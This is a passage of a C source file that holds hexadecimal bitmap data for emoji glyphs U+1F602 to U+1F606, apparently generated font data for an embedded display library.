0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe1, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x71, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3c, 0xe0, 0x0, 0x3e, 0x0, 0x0,
0xf8, 0x0, 0xe, 0x70, 0x0, 0x7f, 0xc0, 0x0,
0xff, 0x0, 0x7, 0x38, 0x0, 0x78, 0x70, 0x0,
0xe1, 0xc0, 0x3, 0xb8, 0x0, 0x30, 0x1c, 0x0,
0xe0, 0x60, 0x0, 0xfc, 0x0, 0x38, 0xe, 0x0,
0x60, 0x38, 0x0, 0x7e, 0x0, 0x18, 0x3, 0x0,
0x30, 0xc, 0x0, 0x3f, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0xff, 0x80,
0x0, 0x0, 0xff, 0x80, 0x3f, 0x0, 0xff, 0xff,
0xf1, 0xff, 0xff, 0xe0, 0x3d, 0xc0, 0x40, 0x7f,
0xff, 0xff, 0xe0, 0x10, 0x1c, 0xe0, 0x20, 0xc,
0x7f, 0xfc, 0x20, 0x8, 0xe, 0x70, 0x10, 0x6,
0x0, 0xc0, 0x10, 0x4, 0x7, 0x38, 0xe, 0x3,
0x0, 0x60, 0x8, 0xe, 0x7, 0x8e, 0x7, 0xe1,
0x80, 0x30, 0x4, 0x3f, 0x3, 0x87, 0x1, 0x7e,
0xc0, 0x18, 0x3, 0xfd, 0x1, 0xc1, 0xc0, 0xc7,
0xfc, 0xc, 0x1f, 0xf1, 0x81, 0xc0, 0xe0, 0x30,
0x3f, 0xff, 0xff, 0x81, 0x80, 0xe0, 0x78, 0x1c,
0x18, 0xff, 0xfc, 0x41, 0xc0, 0xe0, 0x1c, 0x7,
0xc, 0x1, 0x80, 0x21, 0xc0, 0x70, 0x7, 0x1,
0xc6, 0x0, 0xc0, 0x11, 0xc0, 0x70, 0x3, 0xc0,
0x7b, 0x0, 0x60, 0xb, 0xc0, 0x78, 0x0, 0xe0,
0xf, 0x80, 0x30, 0x7, 0x80, 0x38, 0x0, 0x38,
0x3, 0xe0, 0x18, 0xf, 0x80, 0x38, 0x0, 0x1e,
0x0, 0x7f, 0xc, 0x7f, 0x0, 0x38, 0x0, 0x7,
0x80, 0xf, 0xff, 0xfe, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0xff, 0xf8, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F602 "😂" */
0x0, 0x0, 0x0, 0x0, 0x7f, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3f, 0xff, 0xf8,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0xe0,
0x3, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1,
0xf0, 0x0, 0x1, 0xf0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3e, 0x0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x0, 0x7, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0, 0x0,
0xf, 0x0, 0x0, 0x0, 0x0, 0x7, 0x80, 0x0,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x78,
0x0, 0x0, 0x0, 0x0, 0xf0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0x0,
0x0, 0x0, 0x70, 0x0, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x0, 0x7, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x0, 0x0, 0x0, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x7, 0x80,
0x0, 0x0, 0x0, 0x0, 0x3, 0xc0, 0x0, 0x0,
0x78, 0x6, 0x0, 0x0, 0x0, 0x30, 0xf, 0x0,
0x0, 0x3, 0x80, 0xf0, 0x0, 0x0, 0x1, 0xe0,
0x38, 0x0, 0x0, 0x38, 0x1f, 0x0, 0x0, 0x0,
0x7, 0xc0, 0xe0, 0x0, 0x1, 0xc1, 0xe0, 0x0,
0x0, 0x0, 0xf, 0x7, 0x0, 0x0, 0x1c, 0x1c,
0x0, 0x0, 0x0, 0x0, 0x1c, 0x1c, 0x0, 0x0,
0xe1, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x70, 0xe0,
0x0, 0xe, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xc3, 0x80, 0x0, 0x70, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x6, 0x1c, 0x0, 0x3, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe0, 0x0, 0x38, 0x0,
0x3e, 0x0, 0x0, 0xf, 0x80, 0x3, 0x80, 0x1,
0xc0, 0x7, 0xfc, 0x0, 0x1, 0xff, 0x0, 0x1c,
0x0, 0xe, 0x0, 0x70, 0x70, 0x0, 0x1c, 0x1c,
0x0, 0xe0, 0x0, 0x60, 0x7, 0x1, 0xc0, 0x1,
0xc0, 0x70, 0x7, 0x0, 0x7, 0x0, 0x30, 0x6,
0x0, 0xc, 0x1, 0x80, 0x1c, 0x0, 0x38, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x1,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7,
0x0, 0xe, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1f, 0xb8, 0x0, 0x7f, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xff, 0xc0, 0xf, 0xf6, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0x7f, 0x80, 0xf8, 0x30,
0x0, 0x0, 0x0, 0x0, 0x0, 0x18, 0x3e, 0xf,
0x1, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc0,
0x78, 0xe0, 0x18, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0x0, 0xe6, 0x0, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x18, 0x3, 0x70, 0x6, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xc0, 0x1f, 0x0, 0x31,
0xfc, 0x0, 0x0, 0x0, 0x1f, 0xc6, 0x0, 0x78,
0x3, 0xc, 0x3f, 0x80, 0x0, 0x3f, 0xfe, 0x18,
0x3, 0xc0, 0x18, 0x60, 0x3, 0xff, 0xff, 0xc0,
0x30, 0xc0, 0x1e, 0x1, 0xc3, 0x80, 0x0, 0x0,
0x0, 0x3, 0x87, 0x0, 0xf8, 0xc, 0x1f, 0xf0,
0x0, 0x0, 0x3, 0xfc, 0x18, 0xe, 0xe0, 0xe0,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xc0, 0xe0, 0xe3,
0xff, 0x3, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x7,
0xfe, 0xf, 0xf8, 0xf, 0xff, 0xff, 0xff, 0xff,
0xe0, 0x3f, 0xe0, 0x0, 0xe0, 0x3f, 0xff, 0xff,
0xff, 0xfe, 0x3, 0x80, 0x0, 0x7, 0x0, 0xff,
0xff, 0xff, 0xff, 0xe0, 0x18, 0x0, 0x0, 0x1c,
0x3, 0xff, 0xe0, 0x3f, 0xfe, 0x1, 0xc0, 0x0,
0x0, 0x70, 0x7, 0xfc, 0x0, 0x7f, 0xc0, 0x1c,
0x0, 0x0, 0x3, 0x80, 0x1f, 0x80, 0x0, 0xfc,
0x0, 0xe0, 0x0, 0x0, 0xe, 0x0, 0x3c, 0x0,
0x7, 0x80, 0xe, 0x0, 0x0, 0x0, 0x38, 0x0,
0x3c, 0x1, 0xe0, 0x0, 0xe0, 0x0, 0x0, 0x0,
0xe0, 0x0, 0x1f, 0xf0, 0x0, 0xe, 0x0, 0x0,
0x0, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0, 0xe0,
0x0, 0x0, 0x0, 0xe, 0x0, 0x0, 0x0, 0x0,
0xe, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x0, 0x1, 0xe0, 0x0, 0x0, 0x0, 0x0, 0xf0,
0x0, 0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0,
0x1, 0xe0, 0x0, 0x0, 0x3, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x0, 0x7c, 0x0,
0x0, 0x0, 0x0, 0x0, 0xf, 0x80, 0x0, 0xf,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1f, 0xc0,
0x7, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1f, 0xff, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xfe, 0x0, 0x0, 0x0, 0x0,
/* U+1F603 "😃" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xff, 0xff, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0xf, 0xc0, 0x0, 0x7, 0xe0, 0x0,
0x0, 0x0, 0xf, 0x0, 0x0, 0x0, 0x78, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0xf, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x78,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x78, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xc0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xf0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf, 0x0, 0x7, 0x0, 0x0, 0x18,
0x0, 0x1e, 0x7, 0x0, 0x3, 0xc0, 0x0, 0x1e,
0x0, 0x7, 0x7, 0x80, 0x3, 0xf0, 0x0, 0x1f,
0x80, 0x3, 0xc3, 0x80, 0x1, 0xf8, 0x0, 0xf,
0xc0, 0x0, 0xe1, 0xc0, 0x1, 0xfe, 0x0, 0xf,
0xf0, 0x0, 0x71, 0xc0, 0x0, 0xff, 0x0, 0x7,
0xf8, 0x0, 0x1c, 0xe0, 0x0, 0x7f, 0x80, 0x3,
0xfc, 0x0, 0xe, 0x70, 0x0, 0x3f, 0xc0, 0x1,
0xfe, 0x0, 0x7, 0x38, 0x0, 0x1f, 0xe0, 0x0,
0xff, 0x0, 0x3, 0xb8, 0x0, 0xf, 0xf0, 0x0,
0x7f, 0x80, 0x0, 0xfc, 0x0, 0x7, 0xf8, 0x0,
0x3f, 0xc0, 0x0, 0x7e, 0x0, 0x1, 0xf8, 0x0,
0xf, 0xc0, 0x0, 0x3f, 0x0, 0x0, 0xfc, 0x0,
0x7, 0xe0, 0x0, 0x1f, 0x80, 0x0, 0x3c, 0x0,
0x1, 0xe0, 0x0, 0xf, 0xc0, 0x0, 0x1c, 0x0,
0x0, 0xe0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x20, 0x0,
0x0, 0x0, 0x0, 0x80, 0x1d, 0xc0, 0x7f, 0x80,
0x0, 0x0, 0xf, 0xf0, 0x1c, 0xe0, 0x30, 0xff,
0x0, 0x1, 0xff, 0xf8, 0xe, 0x70, 0x18, 0x0,
0xff, 0xff, 0xf0, 0xc, 0x7, 0x38, 0xe, 0x0,
0x0, 0x0, 0x0, 0xe, 0x3, 0x8e, 0x7, 0xfc,
0x0, 0x0, 0x0, 0xfe, 0x3, 0x87, 0x1, 0xff,
0xff, 0xff, 0xff, 0xff, 0x1, 0xc3, 0xc0, 0x7f,
0xff, 0xff, 0xff, 0xff, 0x1, 0xe0, 0xe0, 0x3f,
0xff, 0xff, 0xff, 0xff, 0x80, 0xe0, 0x78, 0xf,
0xff, 0xff, 0xff, 0xff, 0x80, 0xf0, 0x1c, 0x3,
0xff, 0xff, 0xff, 0xff, 0x80, 0x70, 0xf, 0x0,
0xff, 0xf8, 0xf, 0xff, 0x80, 0x78, 0x3, 0x80,
0x1f, 0xf0, 0x1, 0xff, 0x0, 0x38, 0x0, 0xe0,
0x7, 0xe0, 0x0, 0x3f, 0x0, 0x38, 0x0, 0x78,
0x0, 0xf0, 0x0, 0x1e, 0x0, 0x3c, 0x0, 0x1e,
0x0, 0xf, 0x0, 0x78, 0x0, 0x3c, 0x0, 0x7,
0x80, 0x0, 0x7f, 0xe0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0x1e, 0x0, 0x0, 0x0, 0xf0, 0x0, 0x0,
0x0, 0x7, 0xe0, 0x0, 0x3, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F604 "😄" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe1, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x71, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3c, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x70, 0x0, 0x1f, 0x0, 0x0,
0x7c, 0x0, 0x7, 0x38, 0x0, 0x3f, 0xe0, 0x0,
0xff, 0x80, 0x3, 0xb8, 0x0, 0x38, 0x38, 0x0,
0xe0, 0xe0, 0x0, 0xfc, 0x0, 0x38, 0xe, 0x0,
0xe0, 0x38, 0x0, 0x7e, 0x0, 0x18, 0x3, 0x0,
0x60, 0xc, 0x0, 0x3f, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3d, 0xc0, 0x7f, 0x0,
0x0, 0x0, 0x7, 0xf0, 0x1c, 0xe0, 0x30, 0xfe,
0x0, 0x0, 0xff, 0xf8, 0xe, 0x70, 0x18, 0x0,
0xff, 0xff, 0xf0, 0xc, 0x7, 0x38, 0xe, 0x0,
0x0, 0x0, 0x0, 0xe, 0x7, 0x8e, 0x7, 0xfc,
0x0, 0x0, 0x0, 0xff, 0x3, 0x87, 0x1, 0xff,
0xff, 0xff, 0xff, 0xff, 0x1, 0xc1, 0xc0, 0xff,
0xff, 0xff, 0xff, 0xff, 0x81, 0xc0, 0xe0, 0x3f,
0xff, 0xff, 0xff, 0xff, 0x80, 0xe0, 0x78, 0xf,
0xff, 0xff, 0xff, 0xff, 0x80, 0xe0, 0x1c, 0x3,
0xff, 0xff, 0xff, 0xff, 0x80, 0x70, 0x7, 0x0,
0xff, 0xf8, 0xf, 0xff, 0x80, 0x70, 0x3, 0xc0,
0x1f, 0xf0, 0x1, 0xff, 0x0, 0x78, 0x0, 0xe0,
0x7, 0xe0, 0x0, 0x3f, 0x0, 0x38, 0x0, 0x38,
0x0, 0xf0, 0x0, 0x1e, 0x0, 0x38, 0x0, 0x1e,
0x0, 0xf, 0x0, 0x78, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x7f, 0xc0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F605 "😅" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0xff, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0,
0x4, 0x0, 0x0, 0x0, 0x7c, 0x0, 0x0, 0x7c,
0x0, 0x70, 0x0, 0x0, 0xf, 0x80, 0x0, 0x0,
0xf8, 0x3, 0xc0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x1, 0xf0, 0x3e, 0x0, 0x0, 0x1e, 0x0, 0x0,
0x0, 0x3, 0xc3, 0x98, 0x0, 0x3, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x18, 0xe0, 0x0, 0x3c, 0x0,
0x0, 0x0, 0x0, 0x1d, 0xc3, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x7c, 0xc, 0x0, 0x3c,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0x70, 0x3,
0xc0, 0x0, 0x0, 0x0, 0x0, 0xe, 0x1, 0x80,
0x1c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x60, 0x6,
0x1, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x7, 0x0,
0x30, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0, 0x30,
0x0, 0xc0, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x1,
0x80, 0x6, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x18, 0x0, 0x38, 0xf0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xc0, 0x0, 0xc7, 0x0, 0x0, 0x0, 0x0,
0x0, 0x6, 0x0, 0x6, 0x38, 0x0, 0x0, 0x0,
0x0, 0x0, 0x30, 0x0, 0x33, 0x80, 0x0, 0x0,
0x0, 0x0, 0x1, 0x80, 0x1, 0x9c, 0x0, 0x0,
0x0, 0x0, 0x0, 0xc, 0x0, 0xd, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x70, 0x0, 0xee, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0x80, 0x6, 0x70,
0x0, 0x3f, 0x80, 0x0, 0xfc, 0xe, 0x0, 0x73,
0x80, 0x3, 0xfe, 0x0, 0x1f, 0xf8, 0x3c, 0xf,
0x38, 0x0, 0x3c, 0x78, 0x1, 0xe1, 0xe0, 0xff,
0xe1, 0xc0, 0x3, 0x80, 0xe0, 0x1e, 0x3, 0x80,
0xff, 0xe, 0x0, 0x18, 0x3, 0x0, 0x60, 0xc,
0x0, 0x38, 0x70, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xc3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x1c, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x70, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0x87, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe1, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xe, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x70,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xc1,
0xc0, 0x7f, 0x0, 0x0, 0x0, 0x7, 0xe0, 0x1c,
0xe, 0x3, 0xf, 0xe0, 0x0, 0xf, 0xff, 0x80,
0xe0, 0x70, 0x18, 0x0, 0xff, 0xff, 0xf0, 0xc,
0x7, 0x3, 0x80, 0xe0, 0x0, 0x0, 0x0, 0x1,
0xc0, 0x38, 0xe, 0x7, 0xf8, 0x0, 0x0, 0x1,
0xfe, 0x3, 0x80, 0x70, 0x1f, 0xff, 0xff, 0xff,
0xff, 0xf0, 0x1c, 0x1, 0xc0, 0xff, 0xff, 0xff,
0xff, 0xff, 0x1, 0xe0, 0xe, 0x3, 0xff, 0xff,
0xff, 0xff, 0xf0, 0xe, 0x0, 0x78, 0xf, 0xff,
0xff, 0xff, 0xff, 0x80, 0xf0, 0x1, 0xc0, 0x3f,
0xff, 0xff, 0xff, 0xf8, 0x7, 0x0, 0x7, 0x0,
0xff, 0xf8, 0xf, 0xff, 0x0, 0x70, 0x0, 0x3c,
0x1, 0xff, 0x0, 0x1f, 0xf0, 0x3, 0x80, 0x0,
0xe0, 0x7, 0xe0, 0x0, 0x3e, 0x0, 0x38, 0x0,
0x3, 0x80, 0xf, 0x0, 0x3, 0xc0, 0x3, 0x80,
0x0, 0x1e, 0x0, 0xf, 0x0, 0x78, 0x0, 0x3c,
0x0, 0x0, 0x78, 0x0, 0xf, 0xfc, 0x0, 0x3,
0xc0, 0x0, 0x1, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x3c, 0x0, 0x0, 0x7, 0x80, 0x0, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x1e, 0x0, 0x0, 0x0,
0x0, 0x38, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x0, 0x7, 0x80, 0x0, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0xf8, 0x0, 0x0, 0x0, 0x1, 0xf0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x0, 0x3,
0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x7, 0xf0, 0x1, 0xfc, 0x0, 0x0, 0x0, 0x0,
0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xff, 0x80, 0x0, 0x0, 0x0,
/* U+1F606 "😆" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0x60, 0x0, 0x0, 0x0,
0x3, 0x0, 0xe1, 0xc0, 0x7c, 0x0, 0x0, 0x0,
0x7, 0xc0, 0x71, 0xc0, 0xf, 0x80, 0x0, 0x0,
